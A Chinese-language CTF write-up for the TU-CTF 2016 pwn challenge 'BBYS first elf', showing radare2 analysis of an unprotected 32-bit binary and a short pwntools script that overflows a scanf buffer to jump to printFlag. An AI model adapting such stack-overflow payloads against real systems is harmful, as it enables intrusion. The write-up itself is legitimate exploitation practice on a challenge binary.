CTF练习-TU-CTF-2016 pwn BBYS-first-elf-25 记录

题目简介

太水了没啥好简介的，radare2打开（我用的linux，闲win虚拟机太麻烦一般懒得用ida）

[0x080485c9]> iI
havecode true
pic      false
canary   false
nx       true
crypto   false
va       true
intrp    /lib/ld-linux.so.2
bintype  elf
class    ELF32
lang     c
arch     x86
bits     32
machine  Intel 80386
os       linux
minopsz  1
maxopsz  16
pcalign  0
subsys   linux
endian   little
stripped false
static   false
linenum  true
lsyms    true
relocs   true
rpath    NONE
binsz    7591

然后查看main函数，发现就是一个输入一个输出，输入使用了scanf，输入的是一个字符串，漏洞很明显。。。栈溢出

[0x080485c9]> s main
[0x080485c9]> pdf
;-- main:
/ (fcn) sym.main 60
|   sym.main ();
|           ; var int local_4h @ esp+0x4
|           ; var int local_14h @ esp+0x14
|           ; JMP XREF from 0x08048487 (entry0)
|           ; DATA XREF from 0x08048487 (entry0)
|           0x080485c9 01:002b      55             push ebp
|           0x080485ca 01:002c      89e5           mov ebp, esp
|           0x080485cc 01:002d      83e4f0         and esp, 0xfffffff0
|           0x080485cf 01:002e      83ec20         sub esp, 0x20
|           0x080485d2 01:002f      c70424ac8604.  mov dword [esp], str.This_program_is_hungry._You_should_feed_it. ; [0x80486ac:4]=0x73696854 LEA str.This_program_is_hungry._You_should_feed_it. ; "This program is hungry. You should feed it." @ 0x80486ac ; const char * s
|           0x080485d9 00:0000      e842feffff     call sym.imp.puts  ; int puts(const char *s);
|           0x080485de 01:0030      8d442414       lea eax, dword [esp + local_14h] ; 0x14
|           0x080485e2 01:0031      89442404       mov dword [esp + local_4h], eax
|           0x080485e6 01:0032      c70424d88604.  mov dword [esp], 0x80486d8 ; [0x80486d8:4]=0x44007325 ; const char * format
|           0x080485ed 00:0000      e86efeffff     call sym.imp.__isoc99_scanf; int scanf(const char *format);
|           0x080485f2 01:0033      c70424db8604.  mov dword [esp], str.Do_you_feel_the_flow_ ; [0x80486db:4]=0x79206f44 LEA str.Do_you_feel_the_flow_ ; "Do you feel the flow?" @ 0x80486db ; const char * s
|           0x080485f9 00:0000      e822feffff     call sym.imp.puts  ; int puts(const char *s);
|           0x080485fe 01:0034      b800000000     mov eax, 0
|           0x08048603 01:0035      c9             leave
\           0x08048604 00:0000      c3             ret

题目分析

那么怎么利用呢？ 刚开始想开启了NX，以为需要rop，可是25分啊，rop是不是太费神了一点，于是留个心眼，AFL一下

[0x080485c9]> afl
0x080483b4    3 35           sym._init
0x080483f0    1 6            sym.imp.fflush
0x08048400    1 6            sym.imp.fgets
0x08048410    1 6            sym.imp.fclose
0x08048420    1 6            sym.imp.puts
0x08048430    1 6            loc.imp.__gmon_start__
0x08048440    1 6            sym.imp.__libc_start_main
0x08048450    1 6            sym.imp.fopen
0x08048460    1 6            sym.imp.__isoc99_scanf
0x08048470    1 33   -> 95   entry0
0x080484a0    1 4            sym.__x86.get_pc_thunk.bx
0x080484b0    4 42           sym.deregister_tm_clones
0x080484e0    4 55           sym.register_tm_clones
0x08048520    3 30           sym.__do_global_dtors_aux
0x08048540    4 45   -> 44   sym.frame_dummy
0x0804856d    1 92           sym.printFlag
0x080485c9    1 60           sym.main
0x08048610    4 97           sym.__libc_csu_init
0x08048680    1 2            sym.__libc_csu_fini
0x08048684    1 20           sym._fini

好吧，如此明显的printFlag，因为没有canary，溢出之后返回地址指向printFlag即可。。

exp

from pwn import *

def pwn():
r = process("./3d726802521a9ce2b24e2c3baf039915e48ad056")

payload = 'a' * 24 + '\x6d\x85\x04\x08'

r.sendline(payload)
print(r.recv())

if __name__ == "__main__":
pwn()